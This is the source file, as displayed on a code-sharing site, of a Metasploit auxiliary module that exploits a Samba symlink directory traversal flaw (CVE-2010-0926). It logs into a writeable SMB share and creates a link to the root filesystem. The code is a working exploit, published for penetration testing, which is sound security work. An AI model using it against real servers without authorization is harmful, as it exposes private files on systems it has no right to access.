CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/smb/samba_symlink_traversal.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7


8
  # Exploit mixins should be called first

9
  include Msf::Exploit::Remote::SMB::Client

10
  include Msf::Auxiliary::Report

11


12
  # Aliases for common classes

13
  SIMPLE = Rex::Proto::SMB::SimpleClient

14
  XCEPT  = Rex::Proto::SMB::Exceptions

15
  CONST  = Rex::Proto::SMB::Constants

16


17


18
  def initialize

19
    super(

20
      'Name'        => 'Samba Symlink Directory Traversal',

21
      'Description' => %Q{

22
        This module exploits a directory traversal flaw in the Samba

23
      CIFS server. To exploit this flaw, a writeable share must be specified.

24
      The newly created directory will link to the root filesystem.

25
      },

26
      'Author'      =>

27
        [

28
          'kcope', # http://lists.grok.org.uk/pipermail/full-disclosure/2010-February/072927.html

29
          'hdm'    # metasploit module

30
        ],

31
      'References'  =>

32
        [

33
          ['CVE', '2010-0926'],

34
          ['OSVDB', '62145'],

35
          ['URL', 'http://www.samba.org/samba/news/symlink_attack.html']

36
        ],

37
      'License'     => MSF_LICENSE

38
    )

39


40
    register_options([

41
      OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server']),

42
      OptString.new('SMBTARGET', [true, 'The name of the directory that should point to the root filesystem', 'rootfs'])

43
    ])

44


45
    deregister_options('SMB::ProtocolVersion')

46
  end

47


48


49
  def run

50
    print_status("Connecting to the server...")

51
    connect(versions: [1])

52
    smb_login()

53


54
    print_status("Trying to mount writeable share '#{datastore['SMBSHARE']}'...")

55
    self.simple.connect("\\\\#{rhost}\\#{datastore['SMBSHARE']}")

56


57
    print_status("Trying to link '#{datastore['SMBTARGET']}' to the root filesystem...")

58
    self.simple.client.symlink(datastore['SMBTARGET'], "../" * 10)

59


60
    print_status("Now access the following share to browse the root filesystem:")

61
    print_status("\t\\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['SMBTARGET']}\\")

62
    print_line("")

63
  end

64
end

65


66